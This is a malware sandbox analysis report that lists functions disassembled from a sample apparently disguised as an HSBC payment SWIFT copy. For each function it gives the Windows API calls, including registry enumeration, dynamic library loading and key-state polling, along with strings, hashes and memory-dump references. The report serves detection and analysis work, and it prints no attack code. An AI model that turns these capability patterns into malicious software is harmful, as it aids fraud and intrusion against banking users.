Function 00786D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00786DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00786DEF
GetStdHandle.KERNEL32(0000000C), ref: 00786E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00786E3B

Strings

nul, xrefs: 00786E36

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 8cb2513d1247ece21bcf63d0f87aa1b4b13e7b3d2471cb301974c808fffbe791
Instruction ID: 51f04c3454f87ea2a49d3e5f14561e8f5759fd016e068dd8ce632b0a3ee9049b
Opcode Fuzzy Hash: 8cb2513d1247ece21bcf63d0f87aa1b4b13e7b3d2471cb301974c808fffbe791
Instruction Fuzzy Hash: EA218174740209BBDF20AF69DC04B9A77B4FF85720F204619FDA1D72D0D77499508B64

Function 00786E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00786E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00786EBB
GetStdHandle.KERNEL32(000000F6), ref: 00786ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00786F06

Strings

nul, xrefs: 00786F01

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: cbe88f7e98c92256a88ad86c84cdcfe957958af0cc3e551d50dcbde1b406bccf
Instruction ID: 84924bacadbaa45ae65743d8bb1e727f05e6e644b9969a4c407a660a527c8dc6
Opcode Fuzzy Hash: cbe88f7e98c92256a88ad86c84cdcfe957958af0cc3e551d50dcbde1b406bccf
Instruction Fuzzy Hash: 5C21B679540305BBDB20AF69DC04A9A77E8FF85730F204A19FDA1D72D0EB74A850CB61

Function 0078AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0078AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0078ACA8
__swprintf.LIBCMT ref: 0078ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,007AF910), ref: 0078ACFF

Strings

%lu, xrefs: 0078ACBB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: b01ce67af530e7e8a7fb2a14c15485566658448e19c7b4eafc9aa28bf6416ac2
Instruction ID: ce3e04f3343951b9290071df086c31316a0c48cab0068016589f51313432df0d
Opcode Fuzzy Hash: b01ce67af530e7e8a7fb2a14c15485566658448e19c7b4eafc9aa28bf6416ac2
Instruction Fuzzy Hash: 6D217170A00109EFCB10EFA5DD49EAE7BB8FF89714B048069F909DB251DB75EA41CB61

Function 00781142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0077FCED,?,00780D40,?,00008000), ref: 0078115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0077FCED,?,00780D40,?,00008000), ref: 00781184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0077FCED,?,00780D40,?,00008000), ref: 0078118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0077FCED,?,00780D40,?,00008000), ref: 007811C1

Strings

@x, xrefs: 0078119D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @x
API String ID: 2875609808-1688982417
Opcode ID: 433c4dfd29e8761309e32daccf18b415519fbe00b7151ec2d7eab407cbb4e432
Instruction ID: 6345e669b785c3c8220d1be0ed0b547ea135795d657e9b04bd4cc087dd63d5a5
Opcode Fuzzy Hash: 433c4dfd29e8761309e32daccf18b415519fbe00b7151ec2d7eab407cbb4e432
Instruction Fuzzy Hash: E3113C31D4051DD7CF00AFE5D848AEEBB7CFF49721F408055EA85B2240CB789562CB95

Function 00781AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00781B19

Strings

EXISTS, xrefs: 00781B41
REMOVE, xrefs: 00781B1F
KEYS, xrefs: 00781B30
APPEND, xrefs: 00781B52

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: b76f31d0724228275d34295cc37f98056cdfaf95a01d26e2d97e4bc2792c18cb
Instruction ID: 798a7520eaea2bfe643d2fe2899fb3b190954e6738b974196ab8667db61af134
Opcode Fuzzy Hash: b76f31d0724228275d34295cc37f98056cdfaf95a01d26e2d97e4bc2792c18cb
Instruction Fuzzy Hash: 08115EB0940118DFCF40EFA4E8558EEB7B4FF26304F5484A5D855A7291EB3A5D06CB90

Function 0079EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0079EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0079EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0079ED6A
CloseHandle.KERNEL32(?), ref: 0079EDEB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 5a8759702c7cd97abef9ad873dfb7c892abd80b72f800c06a0283bc0dd355981
Instruction ID: 7cbdd7ad5ce8425635be059e9a6eada7491df88e4da06e16619f0e52c2acdd38
Opcode Fuzzy Hash: 5a8759702c7cd97abef9ad873dfb7c892abd80b72f800c06a0283bc0dd355981
Instruction Fuzzy Hash: D28184B1600710AFDB60EF28D84AF2AB7E5AF48710F08881DF999DB2D2D775AC40CB55

Function 0074541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0074547B
_memcpy_s.LIBCMT ref: 007454ED
__read_nolock.LIBCMT ref: 0074554B
__filbuf.LIBCMT ref: 0074556E
_memset.LIBCMT ref: 007455B2

Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 3473826d269517cc9d0edf765b116fc27570bc59d42660764efe92d8feb8f0f0
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 2C51E970A00B05DBCB249FA9D84457EB7B3AF41331F248729F8359A2D2D7789D608F41

Function 007A0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 007A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079FDAD,?,?), ref: 007A0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007A00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007A013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007A0183
RegCloseKey.ADVAPI32(?,?), ref: 007A01AF
RegCloseKey.ADVAPI32(00000000), ref: 007A01BC

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 16027cf62125f855dbf2a93cac3a125ff2061c37f905e0db4a2a6da21ae103e4
Instruction ID: 09fe89e7ff6da8bb56ec8daf56aebf57dbae24537ee15b961b805ddd2980ddf4
Opcode Fuzzy Hash: 16027cf62125f855dbf2a93cac3a125ff2061c37f905e0db4a2a6da21ae103e4
Instruction Fuzzy Hash: 5A516C71208204EFD704EF64D885EAEB7E9FF85304F44892DF59587291DB39E944CB92

Function 0079D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0079D927
GetProcAddress.KERNEL32(00000000,?), ref: 0079D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0079D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0079DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0079DA21

Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00787896,?,?,00000000), ref: 00725A2C
Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00787896,?,?,00000000,?,?), ref: 00725A50

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 2a84676e246ce94165793f610d40901340f6351976a80cb97cde721017638552
Instruction ID: 6181bc638834a1d81d8a2cc02c3b3977611d63ecb5e7664687bd141d754cc292
Opcode Fuzzy Hash: 2a84676e246ce94165793f610d40901340f6351976a80cb97cde721017638552
Instruction Fuzzy Hash: B9512675A00619DFCB10EFA8E4889ADB7B5FF19320B04C065E959AB312DB38AD45CF90

Function 0078E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0078E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0078E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0078E687

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0078E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0078E6B4

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 6105ac9e9159153dcc96dbcde4026d9d462b6608c77833279ac691cf43f3e4a9
Instruction ID: 330937d39ae028aa20254e9eb8aee83e44b02117035aa108a37861df08eab5a4
Opcode Fuzzy Hash: 6105ac9e9159153dcc96dbcde4026d9d462b6608c77833279ac691cf43f3e4a9
Instruction Fuzzy Hash: 9A513935A00215DFCB00EF64D985AADBBF5EF49310F1880A9E909AB361DB39ED10CB54

Function 007AA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383e07c7a5fc45f63e9065f4a6284413097f25063f041f985fdbd10d64d5e322
Instruction ID: b7eb72828f266b2d46b4d39ef00d4e0f7cbee6de33ef2e3b77ecf828f9d8c150
Opcode Fuzzy Hash: 383e07c7a5fc45f63e9065f4a6284413097f25063f041f985fdbd10d64d5e322
Instruction Fuzzy Hash: 5D419035905148BFD720DB68CC88FAABBB5EB8A310F144365F816A72E1D738AD41DB51

Function 00722344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00722357
ScreenToClient.USER32(007E57B0,?), ref: 00722374
GetAsyncKeyState.USER32(00000001), ref: 00722399
GetAsyncKeyState.USER32(00000002), ref: 007223A7

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 4e59e948ea394488e33c71aad1dd5c6f5ffb06e946268904c6405ef95423cb7f
Instruction ID: 0d39107b67fa8223668e5064557727969464924b903be47133284776677609f7
Opcode Fuzzy Hash: 4e59e948ea394488e33c71aad1dd5c6f5ffb06e946268904c6405ef95423cb7f
Instruction Fuzzy Hash: 69418E35604219FFDF15DF68CC48AE9BBB4FB05361F20431AF828A22E2C7789954DB91

Function 007763AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007763E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00776433
TranslateMessage.USER32(?), ref: 0077645C
DispatchMessageW.USER32(?), ref: 00776466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00776475

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 471af4153fe5205a746e84c48931faa98ec4e149defac5d4e293ab8400964edd
Instruction ID: dddd0287bda6888a19e8f2a8ba3a412ed9dad68c6b960417fe2cfd3d525c5a0b
Opcode Fuzzy Hash: 471af4153fe5205a746e84c48931faa98ec4e149defac5d4e293ab8400964edd
Instruction Fuzzy Hash: E9310571901ACAEFDF24CFB0CC84BB67BACAB05384F14C165E529CA0A4E73D9944DB60

Function 00778A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00778A30
PostMessageW.USER32(?,00000201,00000001), ref: 00778ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00778AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00778AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00778AF8

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: bf8de98d3930645bab73571d82e79bc4278be28cdddeec1e056b69a899cec1a9
Instruction ID: c55f28df355bf6a85613e20f7d8ce374b5aab700f2350b1035442a72164adbc2
Opcode Fuzzy Hash: bf8de98d3930645bab73571d82e79bc4278be28cdddeec1e056b69a899cec1a9
Instruction Fuzzy Hash: FF31E071500219EBDF14CFA8DD4CA9E3BB5EB45315F11C22AF928EA2D0C7B89910CB91

Function 0077B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0077B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0077B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0077B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0077B27F
_wcsstr.LIBCMT ref: 0077B289

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: c377abfa810cabb5a45beb3739e868dc9e884bfb8cc3a92d4bd8ad7924dcabd1
Instruction ID: 7d4d6d605a1603b165077b921689deb817d21f4dbf770cdf267bf29f4b6a4543
Opcode Fuzzy Hash: c377abfa810cabb5a45beb3739e868dc9e884bfb8cc3a92d4bd8ad7924dcabd1
Instruction Fuzzy Hash: 9221F571605204BAEF155B759C09F7F7B98EF8A7A0F00C13DF908DA162EF799C4096A0

Function 007AB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

GetWindowLongW.USER32(?,000000F0), ref: 007AB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007AB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007AB1CF
GetSystemMetrics.USER32(00000004), ref: 007AB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00790E90,00000000), ref: 007AB216

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 8525cee74c56b0e537df2f5695cc47c39af564e4811d3ccb0b46917046cfec81
Instruction ID: 4141f05d845fc145c2edc2d536b0a893534dc8fb82356863aeac8171eea95b82
Opcode Fuzzy Hash: 8525cee74c56b0e537df2f5695cc47c39af564e4811d3ccb0b46917046cfec81
Instruction Fuzzy Hash: FD218071A11665AFCB109F78DC54B6A37A4FB8A321F108739F922D71E1E7389C609B90

Function 00779307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00779320

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00779352
__itow.LIBCMT ref: 0077936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00779392
__itow.LIBCMT ref: 007793A3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
